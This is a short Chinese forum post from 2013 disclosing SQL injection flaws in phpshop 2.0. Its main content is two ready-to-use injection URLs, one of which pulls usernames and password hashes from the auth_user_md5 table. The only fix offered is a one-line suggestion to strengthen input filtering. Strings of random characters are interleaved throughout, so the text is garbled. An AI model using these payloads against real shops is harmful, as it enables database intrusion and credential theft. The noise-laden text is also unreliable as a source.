标题 : phpshop 2.0 SQL Injection Vulnerability
! V! B* h& y* X; F) r" d5 m( X7 U) p5 C* W O4 y: z: A; v
作者 : By onestree/ ~3 R& `; i; L- H3 ?
下载地址 : http://code.google.com/p/phpshop/downloads/list# ?. f3 Q3 ^% H. {) i
测试地址: windows 7 / ubuntu H+ C' a8 B& o9 u! @- s/ u5 X: |! m
" c. c4 m, O* `* C1 l* D% i
! @6 O( M# Z" k/ X% L: I: w2 CSQLi p0c:1 t2 n' ^. a) S4 ]
+ M$ `4 ~# m- d3 Z9 Z==================
1 j: w' |" g, ] K0 ^ % P0 X( S2 O( f0 o# X- y: M
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'8 V e" N3 k& D! r# I8 \
union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --7 i4 O) C8 f, Q( p: n
! G: a1 @% k4 ?. Rhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--
, y6 f' ^8 a. R8 k8 z5 W C/ a6 n' w) k$ F/ d1 }, o
修复:
0 h, z ], e5 N. a; n加强过滤
. ?) \3 j t# x9 c- ?4 b: A& g) d2 X6 `# p# M: |
( D" u0 P) \' W1 \9 O) V |
发表于 2013-1-18 18:24:10
收藏
支持
反对